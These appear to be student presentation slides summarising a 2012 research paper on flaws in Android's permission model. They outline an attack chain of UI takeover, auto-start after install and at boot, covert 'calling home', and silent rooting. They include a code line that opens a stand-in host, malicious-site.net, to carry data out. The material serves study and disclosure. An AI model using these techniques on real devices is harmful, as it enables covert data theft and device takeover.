Messing with Android's Permission Model 出處:2012 IEEE 11th International Conference on Trust, Security and Privacy in Computing and Communications 作者:Andr’e Egners, Ulrike Meyer , Bjorn Marschollek 組員:9720114王人弘 9820117陳冠謀 9862218盧軒偉 Outline 1. Introduction 2. Related work 3. Overview on Android 4. Android’s permission model 5. Attacks 6. 1. UI takeover 2. Starting Applications after Installation 3. Starting Applications at Boot 4. E.T. Calling Home 5. Silently Rooting Android Conclusion 2/23 I. INTRODUCTION 在行動裝置上安裝APP時,通常會跳出對話框,要求使用者 接受程式所請求的權限或是停止安裝。 使用者對於給予的權限可能會造成什麼風險並不清楚。 Permission Model的設計上,各種選項的精細程度和可變程 度太小,這使攻擊者容易繞過Permission Model的控管。 本篇會介紹Android的Permission Model及一些攻擊的方式。 3/23 II. RELATED WORK 殭屍網路(botnet) Inter-Application communication Permissions of Android apps 其他安全機制與系統漏洞的相關議題 4/23 III. OVERVIEW ON ANDROID Based on 2.6 Linux kernel 具有Linux的優點(file, memory management)和Java類型的 安全性 5/23 III. OVERVIEW ON ANDROID (Cont.) 6/23 III. OVERVIEW ON ANDROID (Cont.) 最底層是Linux kernel,包含process和memory的管理、各 種驅動程式……。針對行動裝置的需求進行優化。 第二層是各種函式庫,包含C library,圖形的2D/3D-graphic library,整理檔案資料的SQLite...…。 同樣在第二層的還有Android runtime所需要的東西,主要是 Dalvik Virtual Machine,由Java Virtual Machine衍生而來, 更適合用在資源有限的裝置上。 7/23 III. OVERVIEW ON ANDROID (Cont.) Application Framework Layer:提供API給應用程式的開發 者使用。其中包含了Package Manager (追蹤管理應用程式和 它的資料)、 Location Manager (管理應用程式的位置)、 View System (UI、繪圖) ……。 最上層是應用程式所在的地方,third-party applications都 在這層。可以使用下面的框架、函式庫……。 8/23 IV. ANDROID’S PERMISSION MODEL API version 11,116 different permissions are predefine Ex. INTERNET – allow accessing the Internet RECEIVE_SMS – for monitoring, recording, or processing incoming SMS RECORD_AUDIO – for recording audio messages Ex. Tetris game request Internet is reasonable but suspicious if it would also requested the permission to read the address book 9/23 URI Permissions Uniform Resource Identifier Applications may wish to pass a URI to another application in order to be able to exchange data. For example, an email application usually protects its emails from being read by other applications using additionally defined permissions. a third-party image viewer should not hold the permissions to read emails directly. image viewer should rather be handed a URI to the data by using the Intent.FLAG_GRANT_READ_URI_PERMISSION flag set by the callee of the function. This enables the receiver, i.e., the image viewer, to read the data at the given URI. 10/23 Permission protection level Level zero – normal permissions ,low risk setting timer, making the phone vibrate the user can request to be notified of the permission request prior to the installation of the application. Level one – dangerous permissions ,high risk initiating phone calls, access to the device’s sensors, the Internet, or sensitive user data, read log file Prior to the installation, installer displays the set of requested dangerous permissions to the user, which decides to either grant or deny the set permissions Only if the user gives his consent to all of the requested permissions, the application can successfully be installed. 11/23 Permission protection level (Cont.) Level two – signature permissions only if the requesting application is signed with the same certificate as the application that declared the permission user agree but no signature cannot be granted Level three – signatureOrSystem only to applications that are in the Android system image or that are signed with the same certificates . 12/23 Permission protection level (Cont.) some flaws the user is only able to grant or deny all permissions at once. granting or denying a particular permission is not possible. refraining from installing an application which might be useful, but requests too many or a suspicious set of permissions. Tetris example 13/23 Known Vulnerabilities Log permissions FAT32 formatted SD cards WebKit browser Most uncovered the past years 14/23 V. ATTACKS An attack path to silently root android 1. Taking over the UI 2. Starting directly after installation 3. Also starting at boot 4. Two-way Internet communication 5. Silently rooting the device 15/23 1.UI takeover • KeyIntercepter - onKeyDown() : handle or pass - handle them but doing nothing • The Home button - Return to Home screen or Show a list of the recently used • Installing from Android Market - The install button -??-> The OK button 16/23 2.Starting Applications after Installation • Would the user start the app? • to receive the INSTALL_REFERRER intent - Google Analytics SDK - chosen by the attacker 17/23 2.Starting Applications after Installation (Cont.) <receiver Android:name=“com.google.android.apps.analytics.AnalyticsReceiver” Android:exported=“true” > <intent-filter> <action android:nace=“com.android.vending.INSTALL_REFERRER”/> </intent-filter> </receiver> 18/23 3.Starting Applications at Boot BOOT_COMPLETED intent Permission –RECEIVE_BOOT_COMPLETED is introduced to prevent from illegitimately starting at system boot... but is forgotten Successfully listenning for the intent without asking for permission 19/23 4.E.T. Calling Home Establishing bidiectional outside communication e.g. a specified dropzone delivering user data,or a command & control server of a botnet -----------------------------VIEW intent------------------------------------------- startActivity(new Intent(Intent.ACTION_VIEW, Uri. Parse(''http://malicious-site.net'')). setFlags(Intent.FLAG_ACTIVITY_NEW_TASK)); 20/23 4.E.T. Calling Home (Cont.) Request HTTP GET to send data URI schemes : deliver data to applications SilentCommunicator - screen off: start the transmission - screen on: browser hide 21/23 5.Silently Rooting Android modified zimperlich-jailbreak:each instance runs with root privileges setuid() calls which intended to change the owner to the user but has been assigned to the calling application -> fail infinite loop which executes the native code until exception Root user can install app and the device owner will not notice! 22/23 VI. CONCLUSION 本篇文章提供了一些Android權限模型的漏洞。攻擊者可藉 由這些漏洞,偷偷的建立雙向的通道,並下載額外的攻擊。更 可以利用不令人起疑的授權請求,來做更複雜的攻擊。 23/23